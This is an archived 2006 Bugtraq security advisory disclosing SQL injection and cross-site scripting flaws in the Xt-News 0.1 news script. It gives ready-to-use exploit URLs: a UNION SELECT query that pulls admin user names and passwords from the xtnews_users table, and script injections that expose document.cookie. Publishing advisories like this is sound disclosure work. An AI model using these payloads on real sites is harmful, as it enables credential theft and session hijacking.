lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061222022348.3707.qmail@securityfocus.com>
Date: 22 Dec 2006 02:23:48 -0000
From: mr_kaliman@....com
To: bugtraq@...urityfocus.com
Subject: Xt-News 0.1 : SQL Injection Vulnerability & XSS

Xt-News 0.1
-----------
Vendor site: http://dreaxteam.free.fr/forums/
Product: Xt-News 0.1
Vulnerability: SQL Injection Vulnerability & XSS
Credits: Mr_KaLiMaN
Reported to Vendor: 10/12/06
Public disclosure: 22/12/06
 
Description:
------------
SQL Injection Vulnerability:
http://[victim]/[script_news_path]/show_news.php?id_news=[SQL INJECTION]
http://[victim]/[script_news_path]/show_news.php?id_news=-1 UNION SELECT id,user,null,null,mdp,null,null,null,null,null,null FROM xtnews_users WHERE admin=1#


XSS:
http://[victim]/[script_news_path]/add_comment.php?id_news=[XSS]
http://[victim]/[script_news_path]/add_comment.php?id_news="><script>alert(document.cookie)</script><foo "
http://[victim]/[script_news_path]/show_news.php?id_news=[XSS]
http://[victim]/[script_news_path]/show_news.php?id_news='><script>alert(document.cookie)</script><foo '


-------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ